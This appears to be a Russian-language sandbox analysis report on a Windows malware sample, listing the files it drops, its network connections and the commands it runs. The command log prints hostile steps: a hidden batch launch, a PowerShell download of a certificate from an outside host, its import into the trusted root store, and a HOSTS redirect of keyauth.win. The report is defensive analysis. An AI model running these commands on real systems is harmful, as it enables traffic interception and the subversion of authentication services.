Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\aut914.tmp
- %TEMP%\w1ovxm9q2pz1gx174i6k.exe
- %TEMP%\aute34.tmp
- %TEMP%\checklmao.bat
- nul
- %WINDIR%\temp\cab3246.tmp
- %WINDIR%\temp\tar3247.tmp
Удаляет следующие файлы
- %TEMP%\aut914.tmp
- %TEMP%\aute34.tmp
- %TEMP%\checklmao.bat
- %WINDIR%\temp\cab3246.tmp
- %WINDIR%\temp\tar3247.tmp
Изменяет файл HOSTS.
Сетевая активность
Подключается к
- 'localhost':49185
- 'localhost':49187
- '18#.#27.107.14':443
TCP
Другие
- 'localhost':49185
- 'localhost':49187
- 'localhost':49188
- '18#.#27.107.14':443
Другое
Создает и запускает на исполнение
- '%TEMP%\w1ovxm9q2pz1gx174i6k.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c @echo off & echo Running checklmao.bat silently... & start "" /min /b cmd /c "%TEMP%\checklmao.bat & exit" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\checklmao.bat & exit"
- '<SYSTEM32>\findstr.exe' /i /c:"%TEMP%\server.crt"
- '<SYSTEM32>\certutil.exe' -store TrustedRoot
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri http://18#.#27.107.14/server.crt -OutFile '%TEMP%\server.crt'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Import-Certificate -FilePath '%TEMP%\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
- '<SYSTEM32>\cmd.exe' /c certutil -store TrustedRoot | findstr /i /c:"%TEMP%\server.crt"
- '<SYSTEM32>\findstr.exe' /C:"18#.#27.107.14 keyauth.win" "<DRIVERS>\etc\hosts"
- '<SYSTEM32>\ipconfig.exe' /flushdns
- '<SYSTEM32>\cmd.exe' /c cls
- '<SYSTEM32>\cmd.exe' /c certutil -hashfile "%TEMP%\W1ovXM9q2pz1gX174i6k.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
- '<SYSTEM32>\certutil.exe' -hashfile "%TEMP%\W1ovXM9q2pz1gX174i6k.exe" MD5
- '<SYSTEM32>\find.exe' /i /v "md5"
- '<SYSTEM32>\find.exe' /i /v "certutil"
